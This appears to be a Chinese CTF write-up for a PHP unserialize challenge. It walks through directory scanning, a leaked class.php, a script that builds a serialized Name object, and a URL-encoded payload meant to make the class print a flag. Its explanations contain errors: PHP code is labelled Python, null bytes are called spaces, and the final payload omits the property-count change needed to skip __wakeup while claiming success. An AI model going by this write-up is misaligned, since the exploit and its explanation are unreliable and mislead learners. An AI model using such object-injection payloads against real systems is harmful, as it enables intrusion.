- 题目:
- 解题思路及步骤:看到题目没什么思路,于是就尝试去扫目录:发现有个有用的目录:www.zip: -x400-600 排除状态码为400-600的
- 于是我们进行访问,果然得到一个新文件www.zip,查看发现有以下内容:
- 查看flag.php,肯定不会再这么明显的地方,
- 查看index.php文件发现真正的题目在这里:
这里是包含了文件,class.php,可知是一个反序列化题目,我们查看一下class.php文件,得到:
python
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
//wakeup()函数的作用是反序列化之前调用,并将username这个属性赋值为guest
//下面这个函数是在对象被销毁时调用
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
//这里可以知道密码应为100,用户名应该为admin
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}- 于是编写脚本:
php
<?php
class Name{
private $username = 'admin';
private $password = '100';
}
$a = new Name();
echo serialize($a);
?>
//输出得到:
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
O表示 序列化类型为对象
4:对象名长度
Name:对象名
2:属性名个数
s:第一个属性类型为字符串
14:第一属性的长度(由于是私有属性,其实际长度比看到的要长,多了类名首尾的空格)
NameusernameL:空格+类名+空格+属性名
后面同理- 由于反序列化后两个空格不见了,这时候在传参为O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}这里面得空格就看不见了,这样也确实得不到结果:
因此使用空格的url编码将其表示出来:O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
- 得到flag:
